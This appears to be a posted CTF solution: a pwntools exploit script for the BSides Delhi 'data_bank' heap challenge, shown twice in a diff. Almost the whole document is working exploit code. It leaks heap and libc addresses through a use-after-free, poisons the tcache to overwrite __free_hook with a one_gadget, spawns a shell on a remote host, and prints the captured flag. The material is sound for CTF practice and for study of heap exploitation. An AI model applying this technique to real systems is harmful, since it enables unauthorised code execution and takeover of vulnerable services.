soez · October 26, 2018 12:57
diff --git a/ctf.bsidesdelhi - data_bank.py b/ctf.bsidesdelhi - data_bank.py
 from pwn import *

 def menu(n):
 	r.recvuntil(">> ")
 	r.sendline(str(n))

 def add(idx, size, payload):
 	menu(1)
 	r.recvuntil("Enter the index:\n")
 	r.sendline(str(idx))
 	r.recvuntil("Enter the size:\n")
 	r.sendline(str(size))
 	r.recvuntil("Enter data:\n")
 	r.sendline(payload)

 def edit(idx, payload):
 	menu(2)
 	r.recvuntil("Enter the index:\n")
 	r.sendline(str(idx))
 	r.recvuntil("Please update the data:\n")
 	r.sendline(payload)
 def remove(idx):
 	menu(3)
 	r.recvuntil("Enter the index:\n")
 	r.sendline(str(idx))

 def view(idx):
 	menu(4)
 	r.recvuntil("Enter the index:\n")
 	r.sendline(str(idx))
 	r.recvuntil("Your data :")
 	return u64(r.recv(6).ljust(8, '\0'))

 def exit():
 	menu(5)

 local = False
 libc = ELF("./libc.so.6")
 env = {"LD_PRELOAD":"./libc.so.6"}
 r = process("./data_bank", env=env) if local else remote("35.200.202.92", 1337)
 add(0, 208, "")
 add(1, 208, "")
 remove(1)
 remove(0)
 heap = view(0) - 0x340
 print "[+] heap: 0x%x" % heap
 edit(0, p64(heap))
 add(2, 208, "")
 add(3, 208, p64(0) + p64(0x251) + p64(0x1) + p64(0x0000000700000000))
 remove(2)
 base_libc = view(2) - 0x3ebca0
 one_gadget = base_libc + 0x4f322
 free_hook = base_libc + libc.symbols['__free_hook']
 print "[+] base_libc: 0x%x" % base_libc
 print "[+] one_gadget: 0x%x" % one_gadget
 print "[+] free_hook: 0x%x" % free_hook
 edit(3, p64(0) + p64(0x251) + p64(0x1) + p64(0x0000000700000000))
 add(4, 8, "")
 remove(4)
 edit(4, p64(free_hook))
 add(5, 8, "")
 add(6, 8, p64(one_gadget))
 remove(5)
 r.interactive()

 '''
 $ id
 uid=1003(data_bank) gid=1004(data_bank) groups=1004(data_bank)
 $ cat flag
 flag{k33p_c0unt_0f_The_entr1e5}
 '''
	from pwn import *

	def menu(n):
	r.recvuntil(">> ")
	r.sendline(str(n))

	def add(idx, size, payload):
	menu(1)
	r.recvuntil("Enter the index:\n")
	r.sendline(str(idx))
	r.recvuntil("Enter the size:\n")
	r.sendline(str(size))
	r.recvuntil("Enter data:\n")
	r.sendline(payload)

	def edit(idx, payload):
	menu(2)
	r.recvuntil("Enter the index:\n")
	r.sendline(str(idx))
	r.recvuntil("Please update the data:\n")
	r.sendline(payload)
	def remove(idx):
	menu(3)
	r.recvuntil("Enter the index:\n")
	r.sendline(str(idx))

	def view(idx):
	menu(4)
	r.recvuntil("Enter the index:\n")
	r.sendline(str(idx))
	r.recvuntil("Your data :")
	return u64(r.recv(6).ljust(8, '\0'))

	def exit():
	menu(5)

	local = False
	libc = ELF("./libc.so.6")
	env = {"LD_PRELOAD":"./libc.so.6"}
	r = process("./data_bank", env=env) if local else remote("35.200.202.92", 1337)
	add(0, 208, "")
	add(1, 208, "")
	remove(1)
	remove(0)
	heap = view(0) - 0x340
	print "[+] heap: 0x%x" % heap
	edit(0, p64(heap))
	add(2, 208, "")
	add(3, 208, p64(0) + p64(0x251) + p64(0x1) + p64(0x0000000700000000))
	remove(2)
	base_libc = view(2) - 0x3ebca0
	one_gadget = base_libc + 0x4f322
	free_hook = base_libc + libc.symbols['__free_hook']
	print "[+] base_libc: 0x%x" % base_libc
	print "[+] one_gadget: 0x%x" % one_gadget
	print "[+] free_hook: 0x%x" % free_hook
	edit(3, p64(0) + p64(0x251) + p64(0x1) + p64(0x0000000700000000))
	add(4, 8, "")
	remove(4)
	edit(4, p64(free_hook))
	add(5, 8, "")
	add(6, 8, p64(one_gadget))
	remove(5)
	r.interactive()

	'''
	$ id
	uid=1003(data_bank) gid=1004(data_bank) groups=1004(data_bank)
	$ cat flag
	flag{k33p_c0unt_0f_The_entr1e5}
	'''